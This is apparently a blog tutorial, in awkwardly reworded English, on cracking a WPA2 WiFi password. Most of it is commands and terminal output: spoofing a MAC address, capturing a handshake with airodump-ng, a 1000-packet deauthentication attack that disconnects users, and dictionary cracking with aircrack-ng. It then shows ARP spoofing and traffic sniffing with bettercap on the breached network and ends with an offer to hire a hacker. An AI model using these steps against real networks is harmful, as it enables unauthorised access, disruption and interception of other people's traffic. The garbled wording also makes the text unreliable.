WIFI used everywhere in the world in special areas of lifestyles: at home, at paintings and even public places for you to hook up with the Internet and do enterprise or personal matters. Wifi Hacking attacks also increasing every day.
Besides all of the advantages of making commercial enterprises and lifestyles less difficult, there are positive drawbacks in phrases of dangers. The lack of confidence in wi-fi networks has been inflicting lots of problems in phrases of breaking into banks, organizations and authorities agencies.
In this article, I will show how to hack WIFI password ethically, and then how to perform a malicious task.
Wifi Hacking Tools needed:
- Debian Based Linux Operating System. Download: https://ubuntu.com/download/desktop
- Laptop with an external “Monitor Mode” supported WIFI adapter.
- aircrack-ng suits, install with the command “apt install aircrack-ng”
- Mac address Changer. Download: https://github.com/alobbs/macchanger/archive/master.zip
Changing the Mac Address
Every network card has a physical static address that is assigned by the network card vendor. This static address called MAC(Media access control) address. The Mac address used to identify other network-connected devices for communication purposes. It is better to change the Mac address before attacking the wifi. We can change it using macchanger. Follow the below commands:
Get the interface
ip addr show
Now Change MAC address
$ip link set wlp7s7 down $macchanger -m 00:01:ff:02:f7:10 wlp7s7 $ip link set wlp7s7 up
Sniffing the wifi packet
All the packet sent to us is in normal mode which shown as “Managed Mode” But as a hacker, we need to capture the packet for wifi Hacking. The “Managed Mode” can’t capture the packet. To capture the packet we need to change the mode to “Monitor”. Let’s see the current mode:
$iwconfig lo no wireless extensions. wlp7s7 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off
We can see the card is in “Managed” mode. We have to change it to “Monitor” mode:
$airmon-ng start wlp7s7 Found 5 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 772 avahi-daemon 775 wpa_supplicant 776 NetworkManager 807 avahi-daemon 1268 dhclient PHY Interface Driver Chipset phy0 wlp7s7 ath9k Qualcomm Atheros AR9287 Wireless Network Adapter (PCI-Express) (rev 01) (mac80211 monitor mode vif enabled for [phy0]wlp7s7 on [phy0]wlp7s7mon) (mac80211 station mode vif disabled for [phy0]wlp7s7)
If we see the status of the card with iwconfig command, it will show “Mode: Monitor” and the interface is now “wlp7s7mon”.
Capturing the packet and Hacking the Wifi password
Airodump-ng is a software that is a part of Aircrack-ng bundle. Capturing all the packets which might be in wireless card variety is allowed by using a packet sniffer. We need to scan all wifi networks.
For target Wifi Hacking, At this time we are going to capture the packet. First, we want to see how many AP(Access point) around us:
$airodump-ng wlp7s7mon BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BB:11:FF:28:AA:77 -46 7 0 0 5 270 WPA2 CCMP PSK Hack_Me $airodump-ng --bssid BB:11:FF:28:AA:77 --channel 8 --write Hack_Me.cap wlp7s7mon
Deauth a client
The problem is we have to wait until a new client gets to the AP. For Wifi Hacking sometimes it becomes tricky. We don’t know when someone will connect. To make the job easier, we can deauthenticate every client/user. This attack will disconnect everyone from the access point if it is even password protected.
$aireplay-ng --deauth 1000 -a BB:11:FF:28:AA:77 -c AA:AB:AC:DD:CC:EE wlp7s7mon
–deauth 1000 (send 1000 packets to take it down)
-a BB:11:FF:28:AA:77 (The access point)
-c AA:AB:AC:DD:CC:EE (Target wifi connected client)
This attack will disconnect the person from wifi access for a while and he will be connected back soon.
Cracking the wifi password
Now Just stop capturing(CTRL+C). Because we are done. We have to just crack the pin. We will see there are several files created:
$ls Hack_Me.cap-01.cap Hack_Me.cap-01.csv Hack_Me.cap-01.kismet.csv Hack_Me.cap-01.kismet.netxml Hack_Me.cap-01.log.csv w.txt
We only need the “Hack_Me.cap-01.cap” at this moment. I also have a wordlist file to make a dictionary attack. Okay, now let’s see if we can crack it 🙂 with a simple aircrack-ng command:
$aircrack-ng Hack_Me.cap-01.cap -w w.txt Aircrack-ng 1.5.2 [00:00:00] 1/1 keys tested (31.30 k/s) Time left: 0 seconds 100.00% KEY FOUND! [ **Mr.Password** ]
We just found the password. Now we will be able to connect to the wifi. Wifi Hacking is done. Now what we can do with the hacked WIFI?
What can be done After hacking the WIFI Password?
After connecting to the AP we can discover all device addresses connected to this same network.
If we run “arp -a” command, then we will be able to see all connected IP and MAC addresses. Also, we can look up with MAC address to get manufacturer details.
We also can scan all the Internal hosts with Nmap. Nmap will be able to discover all the filtered port easily. For example, we can use the bettercap to sniff traffics(Download: https://github.com/bettercap/bettercap).
./bettercap bettercap v2.26.1 (built for Linux amd64 with go1.11.6) [type ‘help’ for a list of commands]
192.168.1.0/24 > 192.168.1.4 » net.sniff on 192.168.1.0/24 > 192.168.1.4 » arp.spoof on 192.168.1.0/24 > 192.168.1.4 » [02:39:24] [net.sniff.dns] dns 220.127.116.11 > 192.168.1.12 : sub.domain.org is 18.104.22.168
We can do some more advanced attacks after connecting to the access point. Today just showed you how a hacker can crack your wifi password and a simple example, that what the hacker can do.
Stay in touch for more interesting article! If you need to hire a hacker contact us.